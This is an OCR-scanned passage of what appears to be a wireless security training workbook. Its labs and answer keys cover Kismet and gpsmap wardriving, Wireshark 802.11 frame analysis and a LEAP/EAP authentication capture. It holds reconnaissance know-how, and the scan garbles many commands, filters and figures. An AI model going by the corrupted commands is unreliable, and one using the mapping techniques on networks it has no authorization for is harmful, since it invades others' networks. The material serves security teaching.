2 -d 800,600 -o scat-#ilt-besid.png -t -a -A 50 -£ 00:40:96:47:86:CE -i -1 bssid gpsmaplab.gps 4 Open the "scat-filt-chan.png" file with the display utility to view the changes to the map. ‘The updated map should look similar to the following, 1-35Scatter plot map with traveled truck, filtered to display only traffic from BSSID 00:40:96:47:86:CE. This completes our first lab exercise. Congratulations. © 1-36Answers Section 1.2.5 Question: How many packets are displayed after applying the WEP bit set filter? Answer: 13 Section 1.2.6 Question: How many packets are displayed after applying the inverse WEP filter? Answer: 1092 Section 1.2.7 Question: How many packets are displayed after removing all the beacon frames from the capture file? Answer: 58 packets using the "wlan.fc.type_subtype != 8" display filter. Section 1.2.8 Question: How many packets are displayed for the given BSSID? :96:47:86:ce" display filter. ‘Answer: 179 packets using the "wlan.bs eq 00 Section 1.2.9 Question: How many packets are displayed for the given BSSID that are not beacon frames? Answer: 24 packets using the "wlan.bssid eq 00:40:96:47:86:ce and wlan.fe.lype_subtype 1= 8" display filter. Section 1.2.10 Question: How many packets are displayed for by excluding data and beacon frames? Answer: 43 packets using the "wlan. fe.type_subtype != 8 and wlan.fc.type_subtype ! 32" display filter. Section 1.2.11 Question: How many packets are displayed with the string "linksys"? ‘Answer: 621 packets using the "frame contains "linksys" * display filter. Section 1.4.2 Question: What does the abbreviation "T" represent in this screen? Answer: The abbreviation "I" is for Turbocell networks, a Lucent Outdoor Router network, Question: What do the abbreviations "A", "P" and "H" represent i ‘Answer: "A" represents wireless networks with an access point, "P" represents a probe request for a network ftom a client and "HI" indicates an ad-hoc network. this column? Question: What keystroke is used to exit the help menu? 1.37Answer: "x" is used to exit the help menu. Section 1.4.4 Question: Does Kismet indicate the network uses WEP for the selected network? Answer: This will depend on the networks that are present in your area. The status of WEP in use for a selected network is indicated in the "WEP" row. Question: What channel is the selected network using? Answer: This will depend on the networks that are present in your area. The channel for the selected network is indicated in the "Channel" row. Question: Is Kismet able to identify the manufacturer for the selected network? What manufacturer does Kismet identify? Answer: This will depend on the networks that are present in your area. In some cases, Kismet will be able to identify the network in the "Manuf" row. In cases when Kismet is unable to identify the network, the manufacturer will be identified as "Unknown", Section 1.4.6 Question: What information are you able to obtain about the networks observed in your area from this window? Answer: This will depend on the networks that are present in your area.Lab 2 - Live Network Mapping Complete the exercises in this lab to reinforce the material covered in the Sniffing Wireless module. To complete these exercises, you will need the Backtrack Security Tools Linux CD, a supported wireless card and a USB GPS, as included in the SWAT. toolkitLab 2-1: Live Network Mapping Purpose: This lab will provide hands-on experience using Kismet and gpsmap to document a live network. Description: In this lab exercise you will use Kismet and the GPS included in your SWAT kit to identify the presence of any wireless networks that exist outside the ‘ conference venue. After collecting network traffic with Kismet, you will return to the classroom environment to download satellite photography information with gpsmap to document the track you traveled and the estimated range of any wireless networks that were reported, Purpose: This lab will provide hands-on experience using Kismet and gpsmap to document a live network. scription: In this lab exercise you will use Kismet and the GPS included in your SWAT kit to identify the presence of any wireless networks that exist outside the conference venue. After collecting network traffic with Kismet, you will return to the classroom environment to download satellite photography information with gpsmap to document the track you traveled and the estimated range of any wireless networks that were reported 2.1.1... Preparing the System Kismet requires the gpsd daemon to collect GPS coordinate information. After booting the Backtrack CD, connect the USB GPS included in your SWAT toolkit to your laptop on an available USB port. The red LED should start blinking when connected. NOTE: Some GPS units from the same manufacturer may have a solid LED when initially powered-on, which tums into a blinking LED when it receives a satellite lock. You should observe the behavior of the LED when you first plug in the LED, noting that a change in the LED behavior indicates a satellite lock. Start the gpsd tool from a shell prompt, as shown: 4 gpsd /dev/tts/vsBo 4Now that the GPS helper software is started, insert the wireless card into an available PCMCIA slot. You may use either the Yagi directional antenna or the omni-directional antennas distributed with your SWAT kit, Next, start Kismet by clicking "K > Backtrack > Wireless Tools > Analyzer > Kismet". Backtrack will start Kismet, storing the captured data in the root user's home directory (/root). At this point, Kismet will automatically channel hop and identify any networks that are discovered. 2.1.2. Verify Kismet and gpsd While inside, itis unlikely you will have connectivity to satellites providing GPS data, However, is Kismet is able to communicate to the gpsd process, and the gpsd process reading data appropriately, Kismet will display lat/on lines of all 0's, as shown below: ee Oe) Sea ns ar} athersphere-npaz A A o A Piero Lame D TE CC Ge ey Ss Ensure that Kismet has the line at above the Status text indicating it is getting data from gpsd. Once you are outside and get a lock on three or more satellites, the GPS will report Valid lat/lon information to Kismet. Kismet will update the display to report this information along with a "Fix" indicator of 3D or 2D (4 or 3 satellites, respectively), as shown below:eres ed aa ents ats pester 2.1.3. Note the Time The next step is to take your laptop and GPS and leave the conference facility to get a clear view of the sky. Please note the time before leaving the conference facility and return in 10 minutes. It may be necessary to step away from the conference facility by 50' or more to get a clear view of the sky in three directions. After leaving the facility and stepping away from the building, watch the red LED on the GPS, When the GPS light is a solid red (stops blinking), the GPS has locked onto three or more satellites and is recording location information. It may take several minutes for the GPS to synchronize with three satellites to get an accurate location reading, please be patient. If after several minutes the GPS LED is still blinking, move farther away from nearby buildings to get a clear view of the sky. Walk with the laptop and GPS for no more than 10 minutes before returning the class room. When you return to the class room, do not forget to reconnect your power adapter! 2.1.4. Map the area The next step is to take your laptop and GPS and leave the conference facility to get a clear view of the sky. It may be necessary to step away from the conference facility by 50° or more to get a clear view of the sky in three directions. After leaving the facility and stepping away from the building, watch the red LED on the GPS. When the GPS light is a solid red (stops blinking), the GPS has locked onto three or more satellites and is recording location information. It may take several minutes for the GPS to synchronize with three satellites to get an accurate location reading, please be patient. Ifafier several minutes the GPS LED is still blinking, move farther away from nearby buildings to get a clear view of the sky. 2-4‘When you return to the class room, do not forget to reconnect your power adapter! 2.1.5. Quit Kismet After retuming from the live network assessment, quit the Kismet tool by pressing "Q" (capital Q). Backtrack will automatically close the XTerm window for Kismet as well, ‘You may also disconnect the GPS at this time if you wish 2.1.6. Identify Kismet Files Return to an XTerm window (or open a new XTerm, if desired). Change to the "root" folder and list all the files that include the word "Kismet", as shown below. # ed /root # 1s Kismet* Kismet-Apr-20-2006-1.csv Kismet-Apr-20-2006-1.network Kismet~Apr-20-2006-1.dump Kismet~Apr-20-2006-1. xml Kismet-Apr-20-2006-1. aps q 2.1.7. Connect to the classroom network Next we will use the "SANS-ROGUEO!" network for connectivity to contact web sites 10 download satellite images of our current location. The SANS-ROGUEOI network is open and does not require a WEP key for authentication. Execute the following commands from a shell prompt to connect to the SANS- ROGUEO! network: ¥ killall dhepead # iwconfig wlan0 essid SANS-ROGUEO1 enc off mode managed # dheped -d wland At this point, your system should be connected to the SANS-ROGUEOI network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance. 2.1.8. Create an estimated range map Estimated range maps are useful to characterize the estimated coverage of a network without requiring a large set of data samples. The estimated range map takes some liberties to estimate the actual useful range of the network based on lost packetcharacteristics and signal strength information, and can paint a very different picture than the hull map. Welll create an estimated map with the following gpsmap options: Command Argument (if Description option any) D Do not delete the source map at completion 8 2 Use the TerraServer sourve for maps -d 800,600 Generate maps at 800x600 resolution -0 venue-range.png Create the output map as "venue-range.png" 7 Use the "range map" diagram format R 30 Change the opacity of range circles to 50% t Draw the track traveled in the diagram format Label the networks with BSSID informa a 1 Select colors based on WEP status *Kismet* gps Kismet GPS collected in this lab exercise Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below. # gpsmap -D -S 2 -d 800,600 -o venue-range.png -t -r -R 50 -1 bosid -n 1 Kismet*.gps ' Gpsmap will attempt to contact the terraservice.net website to download the appropriate satellite photographs based on the latitude and longitude information collected during the assessment, producing the file "venue-range.png". Open the "venue-range.png" file with the display utility as shown below: # display venue-range.png Note that the color selection will identify networks that do not have the WEP bit set as red, Networks with the WEP bit set are identified with green. 2-62.1.9. Create a scatter plot with track-traveled Next, we'll generate a scatter plot map to identify the locations where packets were received, documenting the track that you traveled to collect the information. Well create a scatter plot map with the following gpsmap options: Command Argument (if Description option any) D Do not delete the source map at completion -S 2 Use the TerraServer source for maps “d 800,600 Generate maps at 800x600 resolution “0 venue-seatpng Create the output map as "venue-scat.png” “a Use the "Scatter map" diagram format t Draw the track traveled in the diagram format *Kismet* gps Kismet GPS collected in this lab exercise Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below. 4 gpsmap -D -S 2 -d 800,600 ~o venue-scat.png ~a -t Kismet*.gps somitted for brevity> a Gpsmap will use the cached satellite photographs, producing the file "venue-scat png" Open the "venue-scat.png" file with the display utility as shown below: # display venue-scat.png Note that track traveled may not match the actual path that you walked, due to fluctuations in the accuracy of the GPS readings. When performing an actual assessment, allocate at least 10 minutes for the GPS to synchronize with satellites, placing the GPS as high as possible.2.1.10. Quit Kismet After returning from the live network assessment, quit the Kismet tool by pressing "Q" (capital Q). Backtrack will automatically close the XTerm window for Kismet as well ‘You may also disconnect the GPS at this time if you wish. This completes our second lab exercise. Congratulations. ©Lab 3 - 802.11 MAC Complete the exercises in this lab to reinforce the material covered in the 802.11 MAC module. To complete these exercises, you will need the Wireshark sniffer and the packet captures provides on the SANS SWAT kit CD-ROM.Lab 3-1: Assessing IEEE 802.11 Frames. 3.1.1. Examining the 802.11 frame header In the course material associated with this lab we reviewed the frame formatting for 802.11 frames. It may be helpful to open your course material to the slides depicting the frame format as a reference while you complete this lab. ‘This step will examine the standard header for 802.11 frames, identifying the frame control, duration/ID, destination address, source address, BSSID address, fragment number and sequence number field First, open Wireshark by clicking "K > Run Command ...", enter "wireshatk" in the run dialog box, then click Run, Next, open the “lab3-8021 1.dump" capture file by clicking File > Open from the Wireshark interface. In the "Open" dialog box, navigate to the /tmp/lab3 folder and select the "lab3-8021 1.dump" capture file. Wireshark will open the file, dissect the contents of frames and display them as shown below: Ble Eat Yew Go Gaptre Analyze Statstcs Welp Base OB x eo! ee OTe FB ag fata. ste8, Ro 1 beacon frat S25 F0.8t6100, SSL: drat frondeort Parag Sroateact ste Senateost feaeae Gescon Hane S309 Reo toI0D, SSD fra Srowdcast Bescon { Geocon rane S397 Rt, OeI00, S50: Esocon frane S339 Ao. 0 19 27a) Se Dp tee enn. Ree 002-31 saretess UAV maaozaene eae Wireshark window after opening the "Iub3-8021 I.dump" packet capture.Next, navigate to frame number 34, clicking on the frame. In the dissector view, expand the "IEEE 802.11" tree. It may be helpful to stide the top-frame of the dissector view up to maximize the amount of information that can be displayed in this pane. 3.1.1.1 Examining the frame control field The first field in the header is the frame control field. Clicking on this field will highlight the corresponding two bytes in the packet detail view in the bottom of the Wireshark window. Select frame number 293. Expand the view for the Frame Control field to identify the version, type and subtype fields. ‘The flags field is collapsed with another tree view that can be expanded to identify any flag bits that are set Question: What is the version number, the type and the subtype for this packet? What flags bits are set? 3.1.1.2 Identifying the To DS and From DS bits Two important bits in the frame-control flags field are the To DS and From DS fields. These fields identify if the network is in infrastructure mode, ad-hoc mode or WDS. mode, Remember that infrastructure networks are identified with either From DS or To DS set, but not both, WDS networks set both From DS and To DS, and Ad-hoc networks clear the From DS and To DS fields. Question: Continue to examine frame 293. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet? Question: Select frame 320. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet? Question: Select frame 289. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet? 3.1.1.3 Examining the Duration/ID field ‘The next field in the 802.11 header is the Duration/ID field. Recall from the course material that this field has two functions; it depicts the amount of time that the medium, will be in use in microseconds when a packet is transmitted, and it is used to identify the association identifier when a station associates to the network. Duration: Viewing frame number 34, examine the duration field. This field indicates that 8987 microseconds were needed to transmit this frame, Note that this value changes depending on the amount of traffic on the network and the amount of inter-frame spacing that is required between the transmission of packets. 323Question: Select frame 33, what is the duration? Note that the frame size is consistent with frame number 34. ~ Question: Select frame 32, what is the duration? Note that the frame size is consistent with frame number 34. Question: Select frame 36, what is the duration? Examine the frame size. Is the ratio of duration/packet size consistent with frames 32 and 34? ): The ID field is used by the access point to uniquely identify an associated station known as the association identifier (AID). The ID field is used in the authentication and association process and in station power management for delayed packet delivery while a station is in power-save/conserve mode. Note that this value has a range of 1-207 IEEE 802.1 access points cannot accommodate more than 2007 users without breaking the IEEE specification, since the AID value must not exceed 2007. Question: Select frame 1375. This frame is a WEP authentication frame. What value is listed in the duration field? Note the packet size. Question: Select frame 1377. This is another frame in the WEP authentication process. ‘What value is listed in the duration field? Note the packet size. Question: Select frame 1385. This is a frame in the association process. What value is listed in the duration field? Note the packet size. Question: In frame 1385, navigate to the AID value by clicking IEEE 802.1] wireless LAN management frame > Fixed parameters > Association ID. What is the association ID for this station? 3.1.1.4 Identifying the destination address ‘The first MAC address in the IEEE 802.11 header is the destination address. This address is placed before the other addresses to optimize handling, since the AP is most concerned with where the packet is going, not where is came from. Question: Select frame 199. What is the destination address? Question: Select frame 234. What is the destination address? 3.1.1.3 Identifying the BSSID The BSSID is the second MAC address in the IEEE 802.11 header. This MAC address uniquely identified an access point for infrastructure networks, allowing multiple AP's to operate on the same channel while separating traffic to discrete networks.Question: Select frame 1132. What is the BSSID? Question: Select frame 1133. What is the BSSID? Question: Select frame 1134. What is the BSSID? 3.1.1.6 Identifying address fields In the module for this lab we examined the characteristics of address fields in 802.11 packets. Recall that the 802,11 header has 3 or 4 addresses, and the order of address changes depending on the From DS and To DS flag settings. Use this chart to identify the order of fields based on the settings of these bitwise flags. 0 0 Destination | Source BSSID Not used 1 0 BSSID Source ‘Destination | Not used 0 T Destination | BSSID Souree Not used 1 T Receiver | Transmitter | Destination | Source In order to identify the MAC address in the address | field, we need to first know the contents of the From DS and To DS fields, using this table to identify the address function. Question: Select frame 1124. Examine the contents of the To DS and From DS fields. Whaat is the source address of this frame? Is the node using the source address of this, frame on the wireless network or the wired network? Question: Select frame 1126. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network? Question: Select frame 1134. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network? 3.1.1.7. Identifying fragmentation control fields The fragment number and sequence number fields make up a 16-bit field in the IEEE 802.1] header. The fragment number field indicates the fragment portion that is beingtransmitted as part of a larger packet, The sequence number is a sequential counter that is used 10 associate all the fragments of a packet to a single frame. Note that fragmentation is rarely used on LEEE 802.11 networks. With a maximum. fragment size of 2312 bytes, [EEE 802.11 packets exceed the maximum Ethernet frame size by over 800 bytes. In practice, most wireless clients will set the maximum packet size to that of an Ethemet network to avoid upstream fragmentation. Question: Select frame 1365. What is the sequence number? Note the source address. Question: Select frame 1368. What is the sequence number? Note the difference between the sequence number in this packet and the packet previously sent by this source. Question: Select frame 1367. Whal Question: Select frame 1368. Note that the sequence number is the same as the previous frame. Examine the frame control header and the flags bits of this frame. Note the flags that are set. What is the likely cause for this packet to use the same sequence number? the sequence number? Note the source address. (Hint: Compare the flags that are set in this packet with the flags in the previous packet) " bit) (Hint: Take a look at the flag following the "More Fragment 3.1.2, Assessing Beacon Frames ‘A frequent question on the Wireshark mailing list is "How can I filter beacon frames out ‘of my wireless packet capture (answer: "wlan.fc.type_subtype I= 8"). Despite the frequent requests to exclude this information, beacon frames can be a valuable source of information for an auditor. Follow these steps to assess the beacon frames in the "iab3~ 80211 .dump" packet capture file. 3.1.2.1 Display only beacon frames Use the display filter functionality to exclude all packets except beacon frames. (Hint: Invert the filter listed above) (Hint: The filter should return 219 packets) 3.1.2.2. Examine the destination address ‘The destination address in beacon frames is always the broadcast address. Select the destination address in one of the beacon frames to identify the packet detail byte selection.3.1.2.3 Fixed management frame parameters Beacon frames include three fixed parameters with each packet sent. This includes the timestamp, beacon interval and capability information, Timestamp: The timestamp field is used to synchronize timing for all the stations on the network to ensure transmissions are in sync. This field is a 64-bit counter, incrementing by 1 every microsecond the AP bas been active. With this large a counter field, it would take over 580,000 years for this value to wrap; hopefully we'll have settled on an improved technology for wireless networks by then. An interesting characteristic of this field is that it can provide the auditor with the uptime information of the AP. Since the BSS timestamp starts at 0 and increments by | for each microsecond of uptime, we can take the value and divide it by one million to determine the number of seconds of AP uptime, Select frame 1132. Click to expand the "IEEE 802.11 wireless LAN management frame" field, then expand the "Fixed parameters (12 bytes)" field. Note the Timestamp value is "0x0000000086a33037". Converting this value to decimal, we get 2,258,841,655. Dividing this value by 1,000,000 we can determine the uptime of the AP as 2258.841655 seconds, or 37.5 minutes. Unfortunately, the Backtrack Security Tools distribution does not include a calculator capable of converting hexadecimal to decimal numbers. We ean use the shell (in an XTerm window) to help us with this conversion using the "print?" utility. The printf utility works similar to the C function of the same name. Simply replace the hexadecimal value listed in the example below to have printf print the decimal value, as shown below. root@i{root]# printé "#d\n" 0x0000000086a33037 2258841655 root@1 [root] # ‘The output of the printf utility gives us the uptime of the access point in micro-seconds. ‘We can convert this to an uptime in minutes by dividing this number by (1000000 * 60) where 1000000 is the number of microseconds in a second, and 60 is the number of seconds in a minute. We can use the Backtrack calculator for this simple calculation, or use the shell as shown below. root@1[root]# echo $((60 * 1000000)) 60000000 root@1[root]# echo $((2258841655/60000000) } 37 rootél [root] #Question: Select frame 1387. What is the uptime of the AP? ‘ Beacon interval: The standard configuration of [BEE 802.11 networks is to transmit beacons at a rate of approximately 10 times per second. This frequency is recommended to ensure accurate time synchronization on the network. This value is generally left ( unchanged, unless the wireless network is the WDS type connecting two facilities over a great distance where the round-trip transmission time between the two ends of the connection exceeds 1/10" of a second. Capability information: The capability field is a 16-bit flags field that indicates the functionality that is supported by the AP. This includes if the transmitter can accommodate WEP traffic, if the transmitter is an AP, if short preambles are permitted 1 and many more fields. 3.1.2.4 Tagged management frame parameters Tagged management frames are variable in length and order. Remember that each tagged management parameter has at least three fields - the tag number, the tag length and the tag content. Select frame 71, expanding the "Tagged parameters" field. The first tag indicates the network name or SSID with tag number 0 as “aruba-demo". Note that the tag length is 10 to reflect the 10 bytes in the network name. In the case of networks that do not disclose the SSID or "cloaked" networks, tag number 0 is still set in beacon frames, but the tag content is set to one or more spaces (ASCII character 0x20) Several other tagged parameters are listed in the payload of beacon frames including supported data rates, channel number and supported encryption types. ‘Question: Select frame 71. Which channel is used for this AP according to the "DS Parameter Set" tag? Question: What basic rates are supported by the AP? Question: Select frame 1358, what data rates are supported by this AP? Question: Reference frame 1358. Which channel is used by this AP?3.1.3. Assessing authentication and association ‘When connecting to a wireless network, a client must complete the authentication phase {using open authentication, or shared authentication in the case of WEP networks), and then associates to the network. Let's take a look at this exchange. 3.13.1 Exclude uninteresting traffic Apply the following display filter to exclude all traffic except probe request, probe response, authentication and association traffic: “wlan. fe.type_subtype eq 11 or wlan.fe.type_subtype <6" Click "Apply" to activate the display filter. The filter should return 198 packets. 3.1.3.2. Probe request When a client wishes to connect to a network, they actively or passively scan for available networks. Most clients use the active scanning mechanism by issuing probe requests frames on all channels that it detects wireless activity on, sent to the broadcast address. The probe request packet is another type of a management frame that includes only tagged parameters; no fixed parameters are included in this frame. Question: Select frame 1360. Note the frame subtype as "4", What is the destination address? What is the BSSID?, Question: Reference frame 1360. What is the management information included in tag (0?°'What does this information represent? Question: Reference frame 1360. What is the management information included in tag, 1? What does this information represent? How does this information characterize the client that transmitted this frame? 3.1.3.3 Probe response Upon receiving probe request frames, AP's will respond with the information needed to communicate with the AP. Question: Select frame 1361. Note the frame subtype as "5", Note the destination address in comparison to the source address of frame 1360. What information is supplied to the wireless station with the probe response frame? (Hint: Information in the IEBE 802.11 header) (Hint: Information in the management payload of the frame)3.1.3.4 Authentication ‘The authentication process is defined as open authentication (no keys are required to authenticate) or shared authentication (a shared key must be used to pass the challenge/response authentication exchange). Question: Select frame 1375. Expand the management parameters to reveal the Authentication Algorithm. What type of authentication is used in this exchange? Note the authentication sequence number. Question: Select fiame 1377. Expand the fixed parameters management options. What step number does this frame represent? Expand the tagged parameters options. What is the length of the WEP challenge? ‘Question: Select frame 1381. What is the authentication sequence number? Note that the status code here identifies if the authentication was successful for the client system, Question: How much time was req between frame 1375 and 1381? -d for the challenge/response authentication process 3.1.3.5 Association ‘ While a single station can authenticate to many access points simultaneously, a station ‘ can only be associated to a single station at any given time. Associating to multiple access points simultaneously would create a layer 2 bridging loop, which is not a good thing. Association is a simple process that does not involve any authentication. A client simply requests authentication, and if the AP has sufficient available resources to support the client's connection, it responds with a success message. Question: Select frame 1383. What is the frame control subtype? What tagged parameters are included in this management frame? Question; Select frame 1385. What is the frame control subtype? What field indicates if the AP can support the requested association? What value indicates a successful association request? 3.1.4. Assessing 802.1x EAP exchanges The 802.1x protocol provides a mechanism for network authentication on wireless and wired networks, using different EAP mechanisms to handle the exchange of authentication credentials, In this exercise, we'll use Wireshark to take a look at portions of the 802.1x exchange, identifying the EAP method in use in the supplied packet capture. First, open the "lab3-eap.dump" capture file by clicking File > Open from the Wireshark interface. In the "Open" dialog box, navigate to the /tmp/lab3 folder and select the "lab3- 3-10eap.dump" capture file. Wireshark will open the file, dissect the contents of frames and display them as shown below: Bie ak View Go Coplwre Al Sa aa aie ® x@GiBesoFts HIE aa Heh nee |e sermon] 8 eer] avr] ns [time [sowce [Desthnion 3 7 cer rae i Picnics — Krew inners Cuenta eer, Tan (CTRT jomm nese ‘Grosse pn, tee eo] faim Rrewesass Gratis. femest tase Wrelaae LE) th joawe Slnies ‘ton 00 espn, talon rte tee) 4 o'cabie) Charm tial: Sve hronde s20:38 10 0.088509 Rio Request, EAB.Ctsco Wireless (LEAP) (Nor favpnss ecior mreess 120) Ui ey i key I iy Frave 1 (0 bytes on wire, 40 bytes epturec) eee 80.3 1 Aagheat-Lik Comer Wireshark window after opening the "lab3-eap.dump" packet cupture This packet capture includes the four FCS bytes at the end of each frame, Wireshark doesn't immediately recognize this information, and may report “malformed frame" for some packets. To force Wireshark to recognize the last four bytes as FCS data, click “Edit > Preferences > Protocols > IEEE 802.11 > Assume packets have FCS > OK". 3.1.4.1 EAPOL Start message ‘The first frame in the 802. 1x/EAP exchange is the EAPOL Start message, as show above. This frame marks the beginning of the 802.1x authentication exchange, representing a minimal 802.1x packet. Expand the "802.1x Authentication" tree in the first frame. Identify the version number, and the type value. Note that the length of the packet is 0, indicating there is no payload information. Question: Refer to frame 1. What is the version number and the type value for 802.1x Authentication? 3-13.1.4.2 Identity Request ‘The second frame in this packet capture is an EAP message requesting identity information, as identified in the Protocol and Info columns in the Wireshark display. Question: Is this packet from the AP or from the wireless station”? (Hint: Look at the To and From DS fields in the frame contro! header) (Hint: Look at the source address) Hi : Compare the source address and the BSSID address) Expand the "Extensible Authentication Protocol" tree in frame number 2. Question: What is the value in the EAP Code field in this frame? Note the EAP Id number. Question: Note the 45-byte identity string that is included in this identify request frame. What device is being identified with this string? 3.1.43 Identity Response ‘The identify response frame follows the identify request. The identify response usually discloses the username of the person who is authenticating, except in the case of the EAP type TTLS where this information is not disclosed (only "anonymous" is listed in this, frame for TTLS networks). Question: What is the EAP Code for frame number 3? Question: What is the identity information associated with this response frame? ‘Note that the EAP ID number remains the same between the Identify Request and the Identity Response. The EAP ID is used to associate the request and the response data, 3.144 BAP Request After exchanging identity information, the access point sends an EAP Request frame. This frame will contain EAP type-specific information and will vary depending on the selected EAP type. Question: What is the EAP type used in frame number 4? How can you tell? Note the EAP ID number. 3-12In this frame, the "request data” is an 8-byte challenge data stream listed in the peer- challenge field. We'll take a more in-depth lool at the specifics associated with this EAP authentication type later in this course. 3.1.4.5 EAP Response After the supplicant has processed the EAP Request data, it will transmit an EAP response frame. ‘Question: How does the AP associate the EAP Response in frame number 5 with the previous EAP Request frame? The response data in this frame is identified as the "Peer Challenge [8]", which is very misleading since not only does this data represent the supplicant response, it is not 8- bytes in length. Question: How long is the response data in the "Peer Challenge” portion of the frame? (Hint: Click on the field to highlight the data in the packet details view) (Hint: One row of bytes in the packet details view represents 16 bytes) 3.1.4.6 EAP Success/Failure After the AP receives the response data, it will transmit an EAP Success or an EAP Failure message. Question: What is the status of authentication in frame number 6? Question: How does the AP associate the EAP Request and the EAP Response in previous frames with the Success/Failure message in frame number 6? 3.1.4.7, Mutual Authentication Frames 6 and 7 represent the repeated EAP Request and EAP Response proces, this time authentication the access point to the supplicant. Note that there is no matching EAP Success or Failure message here. 3.1.4.8 EAPOL-Key Distribution The final frames in the EAP exchange delivery dynamic key material to the client systems. Note that the keys are not transmitted in plain-text; rather they are encrypted with the Microsoft Point-to-Point Encryption (MPPE) protocol and cannot be deduced by an attacker without knowledge of the user's password information. 3-13Question: Examine frame 9. What type of data is this key used to encrypt? (Hint: Look at the Key Type field) Question: Examining frame 10, what type of data is this key used to encrypt? Question: Assuming all clients have a different unicast key, why are two keys needed for encryption? (Hint: Consider the recipient of broadcast traffic) This completes our third lab exercise. Congratulations. © 3-14Answers Section 3.1 2 * Question: Continue to examine frame 293. What are the scttings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet? Answer: To DS is 0, From DS is 1. This is an infrastructure packet. Question: Select frame 320. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet? Answer: To DS is 1, From DS is 0. This is an infrastructure packet. Question: Select frame 289. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet? Answer: To DS is 0, From DS is 0. This is an ad-hoc packet. Section 3.1.1.3 Question: Select frame 33, what is the duration? Note that the frame size is consistent with frame number 34. Answer: 8987 (113 bytes) Question: Select frame 32, what is the duration? Note that the frame with frame number 34. Answer: 9243 (113 bytes) Question: Select frame 36, what is the duration? Examine the frame size. Is the ratio of duration/packet size consistent with frames 32 and 34? ‘Answer: 4126 (71 bytes). The frame takes approximately 4 the time to transmit, with a reduction of 42 bytes. Question: Select frame 1375. This frame is a WEP authentication frame. What value is listed in the duration field? Note the packet size. Answer: 314 (30 bytes) ‘Question: Select frame 1377. This is another frame in the WEP authentication process. What value is listed in the duration field? Note the packet size. Answer: 314 (160 bytes) ‘Question: Select frame 1385. This is a frame in the association process, What value is listed in the duration field? Note the packet size. Answer: 314 (36 bytes) Question: What is the AID for frame 13857 Answer: The AID is 0x0a or 10 in decimal 3-15Section 3.1.1.4 Question: Select frame 199, What is the destination address? eR AAL Question: Select frame 234, What is the destination address? Answer: 00:04:23:8b:4f:0c Answer: ff: Section 3.1.1.5 Question: Select frame 1132. What is the BSSID? Answer: 00:0b:86:80:54:60 Question: Select frame 1133. What is the BSSID? Answer: 00:40:96:47:86:ce Question: Select frame 1134, What is the BSSID? Answer: (RR ihtrtr Section 3.1.1.6 Question: Select frame 1124. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network? Answer: Source address is 00:04:23:8b:4f.0c, node is on the wireless network, transmitting to the distribution system. Question: Seleot frame 1126. Examine the contents of the To DS and From DS ficlds. ‘What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network? Answer: Source address is 00:0b:8 0, node is on the wired network (distribution system), transmitting to the wireless network. Question: Select frame 1134, Examine the contents of the To DS and From DS fields. ‘Whaat is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network? Answer: Source address is 00:04:23:63:88:47, node is on the wireless network in ad-hoc mode. Scetion 3.1.1.7 Question: Select frame 1365. What is the sequence number? Note the source address. 3-16Answer: 1986 (source 00:40:96:47:86:ce) Question: Select frame 1368. What is the sequence number? Note the difference between the sequence number in this packet and the packet previously sent by this source. Answer: 1987 (source 00:40:96:47:86:ce) Question: Select frame 1367. What is the sequence number? Note the source address. Answer: 1987 (source 00:40:96:47:86:ce) Question: Select frame 1368. Note that the sequence number is the same as the previous frame. Examine the frame contro! header and the flags bits of this frame. Note the flags that are set. What is the likely cause for this packet to use the same sequence number? Frame 1368 is a retransmis number. ion of frame 1367, and therefore uses the same sequence Section 3.1.2.1 Use the filter "wlan.fe.type_subtype eq 8" Section 3.1.2.3 Question: Select frame 1387. What is the uptime of the AP? Answer: 9.-minutes. The BSS Timestamp is 0x0000000020b25 lac or 548,557,228 usec. One million usec in a second is 60,000,000 usec per minute. 548,557,228 divided by 60;000,000 is 9.14 minutes. Section 3.1.2.4 Question: Select frame 71. Which channel is used for this AP according to the "DS Parameter Set" tag? Answer: Channel | (DS Parameter Set field) Question: What basic rates are supported by the AP? Answer: Basic rates include |, 2, 5.5 and 11 Mbps. This AP also supports 6, 9, 12, 18, 24, 36, 48 and 54 Mbps. Question: Select frame 1358, what data rates are supported by this AP? Answer: Data rates include 1, 2, 5.5 and 11 Mops. Question: Reference frame 1358. Which channel is used by this AP? Answer: Channel | Section 3.1.3.2 3-17Question: Select frame 1360. Note the frame subtype as "4". What is the destination address? What is the BSSID? Answer: Destination and BSSID addresses are FARE. Question: Reference frame 1360. What is the management information included in tag 02 What does this information represent? Answer: Tag 0 is the SSID "notsoclever". Question: Reference frame 1360. What is the management information included in tag 1? What does this information represent? How does this information characterize the client that transmitted this frame? Answer: Tag 1 indicates supported rates of 1, 2, 5.5 and 11 Mbps. This indicates that the AP is likely an 802.1 1b access point incapable of supporting higher-speed connections. Scetion 3.1.3.3 ‘Question: Select frame 1361. Note the frame subtype as "5". Note the destination address in comparison to the source address of frame 1360. What information is supplied to the wireless station with the probe response frame? Answer: The BSSID of the network is the most important piece of information given to the client. ‘The client is also provided with all the information in the fixed and tagged ‘management parameters in this frame. Section 3.1.3.4 Question: Select frame 1375. Expand the management parameters to reveal the Authentication Algorithm. What type of authentication is used in this exchange? Note the authentication sequence number. Answer: Shared key authent 0x0001 Question: Select frame 1376. Expand the fixed parameters management options. What step number does this frame represent? Expand the tagged parameters options, What is the length of the WEP challenge? Answer: This frame represents step 2 in the WEP authentication process. The length of the WEP challenge is 128 bytes. Question: Select frame 1381. What is the authentication sequence number? Note that the status code here identifies if the authentication was successful for the client system. jon is used. The authentication sequence number is Answer: The authentication sequence number is 0x0004. Question: How much time was required for the challenge/response authentication process between frame 1375 and 1381? 